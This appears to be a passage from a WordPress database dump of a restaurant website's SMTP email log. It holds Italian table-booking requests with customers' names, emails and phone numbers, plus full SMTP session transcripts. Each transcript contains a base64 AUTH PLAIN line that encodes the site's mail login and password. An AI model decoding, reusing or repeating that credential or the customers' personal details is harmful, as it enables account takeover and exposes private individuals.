ZSAvQWRvYmUtSWRlbnRpdHktVUNTIGRlZgovQ01hcFR5cGUg\r\nMiBkZWYKMSBiZWdpbmNvZGVzcGFjZXJhbmdlCjwwMDAwPiA8RkZGRj4KZW5kY29kZXNwYWNl\r\ncmFuZ2UKMiBiZWdpbmJmcmFuZ2UKPDAwMDA+IDwwMDAwPiA8MDAwMD4KPDAwMDE+IDwwMDFG\r\nPiBbPDAwMjg+IDwwMDUzPiA8MDA2Mz4gPDAwNjE+IDwwMDY0PiA8MDA2NT4gPDAwNkU+IDww\r\nMDdBPiA8MDAyRT4gPDAwMjA+IDwwMDMzPiA8MDAzMT4gPDAwMkY+IDwwMDMwPiA8MDAzMj4g\r\nPDAwMjk+IDwwMDU0PiA8MDA3Mj4gPDAwNkY+IDwwMDc2PiA8MDA2OT4gPDAwNkM+IDwwMDY3\r\nPiA8MDA2RD4gPDAwNzQ+IDwwMDI3PiA8MDA3NT4gPDAwNDM+IDwwMDcwPiA8MDA0Mj4gPDAw\r\nNzM+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9DTWFwIGRl\r\nZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjIxIDAgb2JqCjw8\r\nIC9UeXBlIC9Gb250Ci9TdWJ0eXBlIC9UeXBlMAovQmFzZUZvbnQgL05pbWJ1c1NhbnMtUmVn\r\ndWxhcgovRW5jb2RpbmcgL0lkZW50aXR5LUgKL0Rlc2NlbmRhbnRGb250cyBbNTEgMCBSXQov\r\nVG9Vbmljb2RlIDUyIDAgUj4+CmVuZG9iagoyIDAgb2JqCjw8Ci9UeXBlIC9QYWdlcwovS2lk\r\ncyAKWwo1IDAgUgpdCi9Db3VudCAxCi9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFnZUIgL0lt\r\nYWdlQ10KPj4KZW5kb2JqCnhyZWYKMCA1NAowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAw\r\nMDkgMDAwMDAgbiAKMDAwMDA3NDUxNSAwMDAwMCBuIAowMDAwMDAwMTYzIDAwMDAwIG4gCjAw\r\nMDAwMDAyNTggMDAwMDAgbiAKMDAwMDA1NjAyNCAwMDAwMCBuIAowMDAwMDY3NDE2IDAwMDAw\r\nIG4gCjAwMDAwMDAyOTUgMDAwMDAgbiAKMDAwMDAwMTg5MSAwMDAwMCBuIAowMDAwMDAxOTEx\r\nIDAwMDAwIG4gCjAwMDAwMTM2MDggMDAwMDAgbiAKMDAwMDAxMzYzMCAwMDAwMCBuIAowMDAw\r\nMDE1NDAyIDAwMDAwIG4gCjAwMDAwMTU0MjMgMDAwMDAgbiAKMDAwMDAxNzMxMyAwMDAwMCBu\r\nIAowMDAwMDY5ODA4IDAwMDAwIG4gCjAwMDAwMTczMzQgMDAwMDAgbiAKMDAwMDA1MzA2OCAw\r\nMDAwMCBuIAowMDAwMDYwOTI2IDAwMDAwIG4gCjAwMDAwNTMwOTAgMDAwMDAgbiAKMDAwMDA1\r\nNTI0NiAwMDAwMCBuIAowMDAwMDc0MzcwIDAwMDAwIG4gCjAwMDAwNTUyNjcgMDAwMDAgbiAK\r\nMDAwMDA1NTMxMiAwMDAwMCBuIAowMDAwMDU1MzY0IDAwMDAwIG4gCjAwMDAwNTU1NTcgMDAw\r\nMDAgbiAKMDAwMDA1NTg1NyAwMDAwMCBuIAowMDAwMDU1NjIxIDAwMDAwIG4gCjAwMDAwNTU3\r\nMzMgMDAwMDAgbiAKMDAwMDA1NTkyMCAwMDAwMCBuIAowMDAwMDU2NDI1IDAwMDAwIG4gCjAw\r\nMDAwNTc3NTIgMDAwMDAgbiAKMDAwMDA1NjE0NiAwMDAwMCBuIAowMDAwMDU2Mzk4IDAwMDAw\r\nIG4gCjAwMDAwNTc3NzMgMDAwMDAgbiAKMDAwMDA1Nzk4MyAwMDAwMCBuIAowMDAwMDYwMTE1\r\nIDAwMDAwIG4gCjAwMDAwNjAzOTggMDAwMDAgbiAKMDAwMDA2MDA5NCAwMDAwMCBuIAowMDAw\r\nMDYxMDY4IDAwMDAwIG4gCjAwMDAwNjEzMjggMDAwMDAgbiAKMDAwMDA2NjY0NSAwMDAwMCBu\r\nIAowMDAwMDY2OTA5IDAwMDAwIG4gCjAwMDAwNjY2MjQgMDAwMDAgbiAKMDAwMDA2NzU1MiAw\r\nMDAwMCBuIAowMDAwMDY3ODE3IDAwMDAwIG4gCjAwMDAwNjkxNjUgMDAwMDAgbiAKMDAwMDA2\r\nOTM4OCAwMDAwMCBuIAowMDAwMDY5MTQ0IDAwMDAwIG4gCjAwMDAwNjk5NTAgMDAwMDAgbiAK\r\nMDAwMDA3MDE2MyAwMDAwMCBuIAowMDAwMDczMzkxIDAwMDAwIG4gCjAwMDAwNzM3MzcgMDAw\r\nMDAgbiAKMDAwMDA3MzM3MCAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDU0Ci9JbmZvIDEg\r\nMCBSCi9Sb290IDI5IDAgUgo+PgpzdGFydHhyZWYKNzQ2MTMKJSVFT0YK\r\n--=_f81b39149308d9a2a5ebf0d054d48623--\r\n.\r\n250 OK id=1k2waq-0008Uu-Ku\r\n'),(21384,1051,'mwb_wgm_order_giftcard','send'),(21385,1056,'success','1'),(21386,1056,'from_header','Alessia Porto <notifiche@ristorantesolymar.it>'),(21387,1056,'to_header','teosphone@gmail.com'),(21388,1056,'reply_to_header','alessia.porto@hotmail.it'),(21389,1056,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21390,1056,'original_to','teosphone@gmail.com'),(21391,1056,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21392,1056,'original_message','Da: Alessia Porto <alessia.porto@hotmail.it>\nTelefono: 3394278012\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuonasera,\r\nChiedo se è possibile prenotare per 2 persone gg 8 a cena.\r\nAttendo vostre\r\nAlessia\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21393,1056,'original_headers','From: Alessia Porto <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: alessia.porto@hotmail.it\n'),(21394,1056,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 04 Aug 2020 12:26:43 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Alessia Porto <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: alessia.porto@hotmail.it\r\nMessage-Id: <067bca31a4648d0449ba1f29c7bac07d@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Tue, 04 Aug 2020 16:26:43 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Alessia Porto <alessia.porto@hotmail.it>=0ATelefono: 3394278012=0AOg=\r\ngetto: Prenotazione=0A=0ACorpo del messaggio:=0ABuonasera,=0D=0AChiedo s=\r\ne =C3=A8 possibile prenotare per 2 persone gg 8 a cena.=0D=0AAttendo vos=\r\ntre=0D=0AAlessia=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inv=\r\niata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolyma=\r\nr.it)\r\n.\r\n250 OK id=1k2zlz-0003Hy-LE\r\n'),(21395,1057,'success','1'),(21396,1057,'from_header','Patrick <notifiche@ristorantesolymar.it>'),(21397,1057,'to_header','teosphone@gmail.com'),(21398,1057,'reply_to_header','patrick.cavagna@gmail.com'),(21399,1057,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21400,1057,'original_to','teosphone@gmail.com'),(21401,1057,'original_subject','Da sito Sol Y Mar: \"Cena\"'),(21402,1057,'original_message','Da: Patrick <patrick.cavagna@gmail.com>\nTelefono: +41797963760\nOggetto: Cena\n\nCorpo del messaggio:\nBuongiorno, vorrei sapere se avete disponibilità di un tavolo per 6 persone, per domenica 23 agosto 2020 \r\nalle h 20:00/20:30.\r\nGrazie\r\nCavagna Patrick\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21403,1057,'original_headers','From: Patrick <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: patrick.cavagna@gmail.com\n'),(21404,1057,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 05 Aug 2020 06:01:43 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Patrick <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: patrick.cavagna@gmail.com\r\nMessage-Id: <907c4822ad46bc07ddf70748dce24453@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Cena\"\r\nDate: Wed, 05 Aug 2020 10:01:43 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Patrick <patrick.cavagna@gmail.com>=0ATelefono: +41797963760=0AOgget=\r\nto: Cena=0A=0ACorpo del messaggio:=0ABuongiorno, vorrei sapere se avete=\r\n disponibilit=C3=A0 di un tavolo per 6 persone, per domenica 23 agosto 2=\r\n020 =0D=0Aalle h 20:00/20:30.=0D=0AGrazie=0D=0ACavagna Patrick=0A=0AAcce=\r\nttato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di conta=\r\ntto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k3GEx-0001hF-Dh\r\n'),(21405,1058,'success','1'),(21406,1058,'from_header','Sabrina Ferrario <notifiche@ristorantesolymar.it>'),(21407,1058,'to_header','teosphone@gmail.com'),(21408,1058,'reply_to_header','PRIGI.PRIGI@LIBERO.IT'),(21409,1058,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21410,1058,'original_to','teosphone@gmail.com'),(21411,1058,'original_subject','Da sito Sol Y Mar: \"PRENOTAZIONE CENA X 3\"'),(21412,1058,'original_message','Da: Sabrina Ferrario <PRIGI.PRIGI@LIBERO.IT>\nTelefono: 3391762237\nOggetto: PRENOTAZIONE CENA X 3\n\nCorpo del messaggio:\nBuongiorno, volevamo prenotare un tavolo per 3 per le 20.30 la sera del 15 agosto. Se non ci fosse posto, andrebbe bene anche 14 o 12 agosto. Grazie, Cordialmente -  Sabrina\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21413,1058,'original_headers','From: Sabrina Ferrario <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: PRIGI.PRIGI@LIBERO.IT\n'),(21414,1058,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 06 Aug 2020 08:42:03 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sabrina Ferrario <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: PRIGI.PRIGI@LIBERO.IT\r\nMessage-Id: <3e62152d390a6e1db4b59b72a5d5c83e@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"PRENOTAZIONE CENA X 3\"\r\nDate: Thu, 06 Aug 2020 12:42:03 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Sabrina Ferrario <PRIGI.PRIGI@LIBERO.IT>=0ATelefono: 3391762237=0AOg=\r\ngetto: PRENOTAZIONE CENA X 3=0A=0ACorpo del messaggio:=0ABuongiorno, vol=\r\nevamo prenotare un tavolo per 3 per le 20.30 la sera del 15 agosto. Se n=\r\non ci fosse posto, andrebbe bene anche 14 o 12 agosto. Grazie, Cordialme=\r\nnte -  Sabrina=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata invia=\r\nta da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.=\r\nit)\r\n.\r\n250 OK id=1k3fDf-0005AH-9E\r\n'),(21415,1059,'success','1'),(21416,1059,'from_header','Nicoletta <notifiche@ristorantesolymar.it>'),(21417,1059,'to_header','teosphone@gmail.com'),(21418,1059,'reply_to_header','nicoletta.cabrini@gmail.com'),(21419,1059,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21420,1059,'original_to','teosphone@gmail.com'),(21421,1059,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21422,1059,'original_message','Da: Nicoletta <nicoletta.cabrini@gmail.com>\nTelefono: 3396533716\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuonasera, vorremmo prenotare per 2 persone ore 20:00 per giovedì 20 Agosto (se possibile all’esterno)\r\nRingraziandovi, rimango in attesa di una vostra conferma \r\n\r\nNicoletta\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21423,1059,'original_headers','From: Nicoletta <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: nicoletta.cabrini@gmail.com\n'),(21424,1059,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 09 Aug 2020 15:05:08 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Nicoletta <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: nicoletta.cabrini@gmail.com\r\nMessage-Id: <c4714cba97afad94d8c03e0a67b2def7@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Sun, 09 Aug 2020 19:05:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Nicoletta <nicoletta.cabrini@gmail.com>=0ATelefono: 3396533716=0AOgg=\r\netto: Prenotazione=0A=0ACorpo del messaggio:=0ABuonasera, vorremmo preno=\r\ntare per 2 persone ore 20:00 per gioved=C3=AC 20 Agosto (se possibile al=\r\nl=E2=80=99esterno)=0D=0ARingraziandovi, rimango in attesa di una vostra=\r\n conferma =0D=0A=0D=0ANicoletta=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1k4qd2-0004eo-SH\r\n'),(21425,1060,'success','1'),(21426,1060,'from_header','Paula Martinez <notifiche@ristorantesolymar.it>'),(21427,1060,'to_header','teosphone@gmail.com'),(21428,1060,'reply_to_header','paulam121@icloud.com'),(21429,1060,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21430,1060,'original_to','teosphone@gmail.com'),(21431,1060,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21432,1060,'original_message','Da: Paula Martinez <paulam121@icloud.com>\nTelefono: 3348737803\nOggetto: Prenotazione\n\nCorpo del messaggio:\nDomani sera verso le 21 per  4 persone\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21433,1060,'original_headers','From: Paula Martinez <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: paulam121@icloud.com\n'),(21434,1060,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 10 Aug 2020 12:49:26 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Paula Martinez <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: paulam121@icloud.com\r\nMessage-Id: <8709f87f95363c7f0415b5ae9f62429f@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Mon, 10 Aug 2020 16:49:26 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Paula Martinez <paulam121@icloud.com>=0ATelefono: 3348737803=0AOgget=\r\nto: Prenotazione=0A=0ACorpo del messaggio:=0ADomani sera verso le 21 per=\r\n  4 persone=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata=\r\n da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it=\r\n)\r\n.\r\n250 OK id=1k5AzG-0005Nj-Vx\r\n'),(21435,1061,'success','1'),(21436,1061,'from_header','Patrick <notifiche@ristorantesolymar.it>'),(21437,1061,'to_header','teosphone@gmail.com'),(21438,1061,'reply_to_header','patrick.cavagna@gmail.com'),(21439,1061,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21440,1061,'original_to','teosphone@gmail.com'),(21441,1061,'original_subject','Da sito Sol Y Mar: \"Cena 23.08.2020\"'),(21442,1061,'original_message','Da: Patrick <patrick.cavagna@gmail.com>\nTelefono: +41797963760\nOggetto: Cena 23.08.2020\n\nCorpo del messaggio:\nBuongiorno desidero prenotare  per domenica 23 agosto alle h21:00 un tavolo per 7 persone.\r\nAvete disponibilità?\r\nIn attesa ringrazio\r\n\r\nCavagna Patrick\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21443,1061,'original_headers','From: Patrick <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: patrick.cavagna@gmail.com\n'),(21444,1061,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 11 Aug 2020 02:00:21 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Patrick <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: patrick.cavagna@gmail.com\r\nMessage-Id: <2af9d1321732e8e8dd386784a0a2d853@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Cena 23.08.2020\"\r\nDate: Tue, 11 Aug 2020 06:00:21 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Patrick <patrick.cavagna@gmail.com>=0ATelefono: +41797963760=0AOgget=\r\nto: Cena 23.08.2020=0A=0ACorpo del messaggio:=0ABuongiorno desidero pren=\r\notare  per domenica 23 agosto alle h21:00 un tavolo per 7 persone.=0D=0A=\r\nAvete disponibilit=C3=A0?=0D=0AIn attesa ringrazio=0D=0A=0D=0ACavagna Pa=\r\ntrick=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un=\r\n modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k5NKg-0006QJ-2L\r\n'),(21445,1062,'solution','All good, mail sent.'),(21446,1062,'success','1'),(21447,1062,'from_header','Davide <notifiche@ristorantesolymar.it>'),(21448,1062,'to_header','teosphone@gmail.com'),(21449,1062,'reply_to_header','zanaroli.davide@gmail.com'),(21450,1062,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21451,1062,'original_to','teosphone@gmail.com'),(21452,1062,'original_subject','Da sito Sol Y Mar: \"Informazione\"'),(21453,1062,'original_message','Da: Davide <zanaroli.davide@gmail.com>\nTelefono: 3479571596\nOggetto: Informazione\n\nCorpo del messaggio:\nSiete aperti e nel caso avreste posto per 4 persone lunedi sera a cena verso le 19.30 20 massimo? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21454,1062,'original_headers','From: Davide <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: zanaroli.davide@gmail.com\n'),(21455,1062,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 16 Aug 2020 03:23:34 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Davide <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: zanaroli.davide@gmail.com\r\nMessage-Id: <005e82ac082d35efeb5fc2cdffdef271@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Informazione\"\r\nDate: Sun, 16 Aug 2020 07:23:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Davide <zanaroli.davide@gmail.com>=0ATelefono: 3479571596=0AOggetto:=\r\n Informazione=0A=0ACorpo del messaggio:=0ASiete aperti e nel caso avrest=\r\ne posto per 4 persone lunedi sera a cena verso le 19.30 20 massimo? Graz=\r\nie=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un mod=\r\nulo di contatto su Sol Y Mar 